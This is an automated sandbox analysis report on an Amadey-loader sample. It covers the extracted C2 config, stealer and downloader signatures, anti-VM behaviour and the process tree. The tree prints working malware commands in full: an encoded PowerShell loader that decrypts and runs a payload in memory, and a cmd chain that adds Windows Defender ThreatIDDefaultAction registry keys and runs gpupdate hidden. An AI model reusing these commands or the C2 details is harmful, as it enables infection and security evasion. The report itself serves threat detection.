Analysis
-
max time kernel
64s -
max time network
92s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/05/2024, 22:25
Static task
static1
Behavioral task
behavioral1
Sample
c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Resource
win11-20240426-en
Errors
General
-
Target
c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
-
Size
1.8MB
-
MD5
aa09230e5ed56143e839e2de4a55ff84
-
SHA1
ac65861dfb9663bffb9e3debfbefadf2d7f18c67
-
SHA256
c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea
-
SHA512
92bd273f18be76cadb1f73d4897770ba2ebd7b2495b0de8e335290ed1be9d003b34859b9f24577326ebe477ed339c9affd1c57a8732aac8424b74ab448132cba
-
SSDEEP
24576:tPh8UVW8RXWZ6gprwfpN6ZubIu85NeUSlTwIqVQFtI6a4wfDHtHavmcQi7fI83pa:tZfqUN6R5HmFzTw5HohQup3pXK
Malware Config
Extracted
amadey
4.20
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" CDwwlA0Ls45oQEjOyyQKhuPH.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3692 created 1084 3692 deat.exe 50 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe -
Drops startup file 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QIzW4tTnR5wqxhqY3fzpSUXQ.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bSAYlQpWBGa5aJGrotVK9Gdj.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z1QRKg56FPaUBj9lH8ZZhZUq.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xG3Dia32NuP8zHqHStzoZEVB.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sr8ILJx7yg64A1wFkUmquwVS.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wBlX6H1a9hrkhVlJlStFwR30.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\teQ8AtSSxpu2pFNcIagfsp4u.bat jsc.exe -
Executes dropped EXE 10 IoCs
pid Process 3992 axplons.exe 1912 lumma1.exe 3024 axplons.exe 2948 file300un.exe 3692 deat.exe 2200 7qGcwJrNG8TOz7Ue3r67oBl0.exe 2864 IEjcMJAJkbtWNiKSfd04xP0y.exe 984 t4ogfR8kzuEXiFbHpQ2MOvGH.exe 1716 35bjmBERCDyFvBhlEXzObc63.exe 4944 CDwwlA0Ls45oQEjOyyQKhuPH.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine axplons.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 pastebin.com 16 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 ipinfo.io 36 ipinfo.io -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol CDwwlA0Ls45oQEjOyyQKhuPH.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI CDwwlA0Ls45oQEjOyyQKhuPH.exe File opened for modification C:\Windows\System32\GroupPolicy CDwwlA0Ls45oQEjOyyQKhuPH.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini CDwwlA0Ls45oQEjOyyQKhuPH.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 3492 c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe 3992 axplons.exe 3024 axplons.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1912 set thread context of 2600 1912 lumma1.exe 86 PID 1444 set thread context of 1128 1444 powershell.exe 95 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\axplons.job c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe -
pid Process 1444 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 3492 c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe 3492 c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe 3992 axplons.exe 3992 axplons.exe 3024 axplons.exe 3024 axplons.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 3692 deat.exe 3692 deat.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 1128 jsc.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 3492 wrote to memory of 3992 3492 c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe 82 PID 3492 wrote to memory of 3992 3492 c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe 82 PID 3492 wrote to memory of 3992 3492 c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe 82 PID 3992 wrote to memory of 1912 3992 axplons.exe 83 PID 3992 wrote to memory of 1912 3992 axplons.exe 83 PID 3992 wrote to memory of 1912 3992 axplons.exe 83 PID 1912 wrote to memory of 4012 1912 lumma1.exe 85 PID 1912 wrote to memory of 4012 1912 lumma1.exe 85 PID 1912 wrote to memory of 4012 1912 lumma1.exe 85 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 1912 wrote to memory of 2600 1912 lumma1.exe 86 PID 3992 wrote to memory of 2948 3992 axplons.exe 88 PID 3992 wrote to memory of 2948 3992 axplons.exe 88 PID 2948 wrote to memory of 2892 2948 file300un.exe 90 PID 2948 wrote to memory of 2892 2948 file300un.exe 90 PID 2892 wrote to memory of 1444 2892 cmd.exe 91 PID 2892 wrote to memory of 1444 2892 cmd.exe 91 PID 3992 wrote to memory of 3692 3992 axplons.exe 93 PID 3992 wrote to memory of 3692 3992 axplons.exe 93 PID 3992 wrote to memory of 3692 3992 axplons.exe 93 PID 3692 wrote to memory of 564 3692 deat.exe 94 PID 3692 wrote to memory of 564 3692 deat.exe 94 PID 3692 wrote to memory of 564 3692 deat.exe 94 PID 3692 wrote to memory of 564 3692 deat.exe 94 PID 3692 wrote to memory of 564 3692 deat.exe 94 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 1128 1444 powershell.exe 95 PID 1444 wrote to memory of 4980 1444 powershell.exe 96 PID 1444 wrote to memory of 4980 1444 powershell.exe 96 PID 1444 wrote to memory of 4980 1444 powershell.exe 96 PID 1128 wrote to memory of 2200 1128 jsc.exe 100 PID 1128 wrote to memory of 2200 1128 jsc.exe 100 PID 1128 wrote to memory of 2200 1128 jsc.exe 100 PID 1128 wrote to memory of 2864 1128 jsc.exe 101 PID 1128 wrote to memory of 2864 1128 jsc.exe 101 PID 1128 wrote to memory of 2864 1128 jsc.exe 101 PID 1128 wrote to memory of 984 1128 jsc.exe 102 PID 1128 wrote to memory of 984 1128 jsc.exe 102 PID 1128 wrote to memory of 984 1128 jsc.exe 102 PID 1128 wrote to memory of 1716 1128 jsc.exe 103 PID 1128 wrote to memory of 1716 1128 jsc.exe 103 PID 1128 wrote to memory of 1716 1128 jsc.exe 103 PID 1128 wrote to memory of 4944 1128 jsc.exe 104 PID 1128 wrote to memory of 4944 1128 jsc.exe 104
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:1084
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:564
-
-
C:\Users\Admin\AppData\Local\Temp\c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe"C:\Users\Admin\AppData\Local\Temp\c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGIAOABuAGIAMQB5ADYAcAA5AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="4⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGIAOABuAGIAMQB5ADYAcAA5AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==5⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"6⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Users\Admin\Pictures\7qGcwJrNG8TOz7Ue3r67oBl0.exe"C:\Users\Admin\Pictures\7qGcwJrNG8TOz7Ue3r67oBl0.exe"7⤵
- Executes dropped EXE
PID:2200
-
-
C:\Users\Admin\Pictures\IEjcMJAJkbtWNiKSfd04xP0y.exe"C:\Users\Admin\Pictures\IEjcMJAJkbtWNiKSfd04xP0y.exe"7⤵
- Executes dropped EXE
PID:2864
-
-
C:\Users\Admin\Pictures\t4ogfR8kzuEXiFbHpQ2MOvGH.exe"C:\Users\Admin\Pictures\t4ogfR8kzuEXiFbHpQ2MOvGH.exe"7⤵
- Executes dropped EXE
PID:984 -
C:\Users\Admin\AppData\Local\Temp\urc.0.exe"C:\Users\Admin\AppData\Local\Temp\urc.0.exe"8⤵PID:4724
-
-
-
C:\Users\Admin\Pictures\35bjmBERCDyFvBhlEXzObc63.exe"C:\Users\Admin\Pictures\35bjmBERCDyFvBhlEXzObc63.exe"7⤵
- Executes dropped EXE
PID:1716
-
-
C:\Users\Admin\Pictures\CDwwlA0Ls45oQEjOyyQKhuPH.exe"C:\Users\Admin\Pictures\CDwwlA0Ls45oQEjOyyQKhuPH.exe"7⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
PID:4944
-
-
C:\Users\Admin\Pictures\9RcB2lrFzwAc9yeZcDFpU6Tm.exe"C:\Users\Admin\Pictures\9RcB2lrFzwAc9yeZcDFpU6Tm.exe"7⤵PID:3716
-
-
C:\Users\Admin\Pictures\n3rp3ahi5KCTVJeUG6vZj6EO.exe"C:\Users\Admin\Pictures\n3rp3ahi5KCTVJeUG6vZj6EO.exe"7⤵PID:3820
-
C:\Users\Admin\AppData\Local\Temp\7zS56B6.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S8⤵PID:4912
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:1784
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"6⤵PID:4980
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4400
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD556e7d98642cfc9ec438b59022c2d58d7
SHA126526f702e584d8c8b629b2db5d282c2125665d7
SHA256a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383
SHA5120be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f
-
Filesize
30.6MB
MD533787bb1279b90b829281fadd9842da7
SHA1232be73341f6211f20e289fde16988790f62fe33
SHA256a94db0a466893661cb536296f2f12ca0799d6fc796829584f5141ad0adee3fcc
SHA512863edf4d9aafa7cea85e663dd0d6435137fd2ebc76cc8221b38dd7155d715e563d3502faba6a6858afbef2898cb44924b53ea71793ac90125004e79985a4419d
-
Filesize
355KB
MD503f10cbac806b88eefb54f36bd951c4c
SHA1bb549f956c028e89c29928cfddf7dbd982db74ad
SHA256be86b0b65953b550f8ba73f059f1cbd91f2ff282f01b6461eb9b29cf8f3e9f66
SHA512ec6b647c63038ba7cd3f2d1f56620042a4520a393e17fd0ddad7ad1140fe9e757935945bd692b8fbc398dd91073b5f3f4fc00514957a6cf68deb2818917e36bc
-
Filesize
1.8MB
MD5aa09230e5ed56143e839e2de4a55ff84
SHA1ac65861dfb9663bffb9e3debfbefadf2d7f18c67
SHA256c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea
SHA51292bd273f18be76cadb1f73d4897770ba2ebd7b2495b0de8e335290ed1be9d003b34859b9f24577326ebe477ed339c9affd1c57a8732aac8424b74ab448132cba
-
Filesize
1.2MB
MD515e218538abd732a085a52449312e610
SHA15ecde74c94c3fa62cf2190708f4f077b9d25a850
SHA25620f31fe1d0eaf13ce55b02d5442c6c8a3d47a1776b0c096fcb3735a38ba3725b
SHA5126e77502e5e443ccd2b77dcc2afe0ba790e615f8d1a51c90f7e0f7add426d4e2ef8941563e8b876f16317a4727d8af8b0efd9d46ce5d726b50e0357794b21e717
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
